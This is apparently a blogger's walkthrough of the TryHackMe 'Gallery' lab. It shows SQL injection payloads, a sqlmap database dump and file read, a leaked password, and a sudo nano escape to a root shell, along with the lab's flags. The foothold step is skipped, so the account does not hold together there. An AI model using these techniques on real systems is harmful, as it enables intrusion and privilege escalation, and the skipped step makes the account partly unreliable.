I’ll be honest .. I wasn’t planning on spending my whole evening after my date untangling a “Simple Image Gallery,” but curiosity got the better of me (and maybe a little double caffeine). What started as a quick peek soon spiraled into a full-on digital treasure hunt. From poking at web forms to chasing down sneaky backup files, this room delivered more surprises than I expected. Still relatively easy to delve in!

If you’re thinking about diving into the Gallery room, or just want to follow along with my misadventures, keep reading for the full play-by-play (and some tips I wish I’d known from the start).

1. Initial Reconnaissance

1.1. Target Discovery

First things first, I grabbed the target IP from TryHackMe and made sure it was up:

ping <target-ip>

1.2. Port Scanning

Time for some Nmap action to uncover open ports and running services:

nmap -sC -sV -oN initial.nmap <target-ip>

Findings:

• 80/tcp — Apache httpd 2.4.29 (Ubuntu)
• 8080/tcp — Apache httpd 2.4.29 (Ubuntu)

Both ports are hosting web servers. This is where the fun begins.

2. Web Application Enumeration

2.1. Browsing the Sites

• Port 80: Default Apache page, nothing interesting.
• Port 8080: A basic “Simple Image Gallery” web app appears.

2.2. Directory and File Brute-Forcing

I ran gobuster to hunt for hidden directories and files:

gobuster dir -u http://<target-ip>:8080 -w /usr/share/wordlists/dirb/common.txt

This revealed standard directories (/images, /uploads, etc.) but nothing immediately juicy.

3. Exploiting the Web App

3.1. Testing for SQL Injection

The gallery app had login and search features. I started testing for SQLi:

• Inputting ' OR 1=1-- - in login fields or search boxes
• Monitoring responses for errors or successful logins

Bingo! The search feature was vulnerable — entries like test' or '1'='1 returned all images.

3.2. Dumping the Database

To automate, I used sqlmap:

sqlmap -u "http://<target-ip>:8080/search.php?query=cat" --level=5 --risk=3 --dump-all

After some patience, sqlmap retrieved the users table. I found the admin hash:

a228b12a08b6527e7978cbe5d914531c

I tried cracking the hash with hashcat and rockyou, but moved on since direct login wasn’t needed for the next steps.

4. Foothold on the System

4.1. Searching for File Upload Vulnerabilities

I checked if the gallery allowed image uploads. It did, but with some restrictions. After trying to upload PHP shells disguised as images (e.g., renaming shell.php to shell.jpg), uploads were filtered but worth noting for future attacks.

4.2. Exploring for Sensitive Files

Since the app was leaking info through SQLi, I used it to read files from the system:

sqlmap --file-read="/etc/passwd" ...

But I didn’t find anything immediately useful. Time to look elsewhere.

5. Local File Discovery

5.1. Checking for Backups

Standard practice: always check /var/backups and similar directories for juicy files.

ls -la /var/backups/

Found: mike_home_backup.tar.gz

5.2. Extracting and Analyzing the Backup

I downloaded the backup using the web vulnerability or by finding a way to grab it through the web app (could use wget, scp, or built-in web server if already on system):

tar -xzvf mike_home_backup.tar.gz
cd mike_home_backup

Inside, I found a .bash_history file.

cat .bash_history

Password discovered:
b3stpassw0rdbr0xx

6. User Privilege Escalation

6.1. SSH or Local Switch

I checked for SSH access, but if unavailable, I used any shell access to switch users:

su mike
# Password: b3stpassw0rdbr0xx

Success! Now running as mike.

6.2. Grabbing the User Flag

cat /home/mike/user.txt

User flag:
THM{af05cd30bfed67849befd546ef}

7. Root Privilege Escalation

7.1. Checking Sudo Permissions

sudo -l

Finding:
(ALL) NOPASSWD: /opt/rootkit.sh

7.2. Analyzing /opt/rootkit.sh

I read the script:

cat /opt/rootkit.sh

It offered a menu, and one option let me open files in nano as root.

7.3. Exploiting Nano for Root Shell

Following GTFOBins:

1. Run: sudo /opt/rootkit.sh
2. Choose the “read” option (opens nano)
3. In nano, press Ctrl+R then Ctrl+X
4. At the prompt, type:
   reset; sh 1>&0 2>&0
5. Hit Enter — now I had a root shell!

7.4. Getting the Root Flag

cat /root/root.txt

Root flag:
THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}

8. Final Notes and Lessons Learned

• Enumeration is everything: Always dig for hidden files, directories, and backup archives.
• SQL injection still works: Don’t overlook classic vulnerabilities.
• Privilege escalation is all about detail: Check sudo rights, read custom scripts, and use GTFOBins tricks.
• Backups and history files are goldmines: Always snoop through them.

Recap of Key Commands

• nmap -sC -sV -oN initial.nmap <target-ip>
• gobuster dir -u http://<target-ip>:8080 -w /usr/share/wordlists/dirb/common.txt
• sqlmap -u "http://<target-ip>:8080/search.php?query=cat" --level=5 --risk=3 --dump-all
• cat .bash_history
• su mike
• sudo -l
• Exploiting nano via GTFOBins in a root shell

If you’re stuck on any step, try to slow down and explore all the files and web features. Good luck and happy hacking!